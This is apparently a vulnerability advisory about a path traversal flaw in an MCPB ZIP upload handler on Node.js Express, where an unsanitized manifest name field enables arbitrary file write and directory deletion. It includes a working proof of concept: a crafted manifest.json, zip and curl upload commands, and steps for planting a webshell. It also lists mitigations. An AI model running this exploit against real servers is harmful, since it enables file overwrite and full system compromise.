MCPB File Upload Handler, Path Traversal, (No CVE) Critical

Listen to this Post

How the mentioned CVE works:

The MCPB file upload handler accepts ZIP archives with a manifest.json file. The manifest contains a “name” field that the server uses to construct a directory path for extraction. On line 107 of mcpbController.ts, the code concatenates `manifest.name` directly into a path template: `server-${manifest.name}` without any sanitization. An attacker can craft a malicious MCPB file where the name field includes path traversal sequences like ../../../etc/malicious. When the server extracts the ZIP, it calls `fs.mkdirSync` and `fs.renameSync` on the unsanitized path, allowing files to be written to arbitrary locations outside the intended upload directory. The `cleanupOldMcpbServer` function (line 110) also uses the same unsanitized name, potentially deleting arbitrary directories if they match the traversal pattern. The upload endpoint `/mcpb/upload` accepts user-supplied files with only extension and size checks, no content validation. The middleware extracts the ZIP, reads manifest.json, and only verifies that the name field is non-empty. There is no `path.resolve` or `basename` filtering, and no whitelist of allowed characters. This leads to a path traversal vulnerability enabling arbitrary file write and directory deletion. The issue exists in production code, not test or demo contexts.

dailycve form:

Platform: Node.js Express
Version: Unknown
Vulnerability: Path Traversal
Severity: Critical
date: 2026-04-23

Prediction: 2026-05-15

What Undercode Say:

Create malicious manifest.json
echo '{"name":"../../../etc/pwned","manifest_version":"1"}' > manifest.json
Package into MCPB (ZIP)
zip malicious.mcpb manifest.json
Upload using curl
curl -X POST -F "[email protected]" http://target/mcpb/upload
Check traversal write
ls -la /etc/pwned
// Vulnerable code snippet
const finalExtractDir = path.join(path.dirname(mcpbFilePath), <code>server-${manifest.name}</code>);
fs.mkdirSync(finalExtractDir, { recursive: true });
fs.renameSync(tempExtractDir, finalExtractDir);

how Exploit:

  1. Craft ZIP file with manifest.json containing name: `../../../var/www/html/shell`
    2. Include malicious payload file (e.g., webshell.php) in ZIP

3. Upload via /mcpb/upload endpoint

  1. Server extracts to traversal path, overwriting critical files
  2. For deletion, use name like `../../../tmp/clean` triggering cleanupOldMcpbServer

Protection from this CVE

  • Sanitize manifest.name with `path.basename()` and reject path separators
  • Normalize path using `path.resolve(baseDir, safeName)` and verify resolved path starts with baseDir
  • Implement whitelist regex: `^[a-zA-Z0-9_.-]+$` for name
  • Validate that finalExtractDir stays within upload base directory before fs operations

Impact:

Arbitrary file write to any filesystem location, arbitrary directory deletion, potential remote code execution by overwriting configs or binaries, complete system compromise if writing to startup scripts or cron directories.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top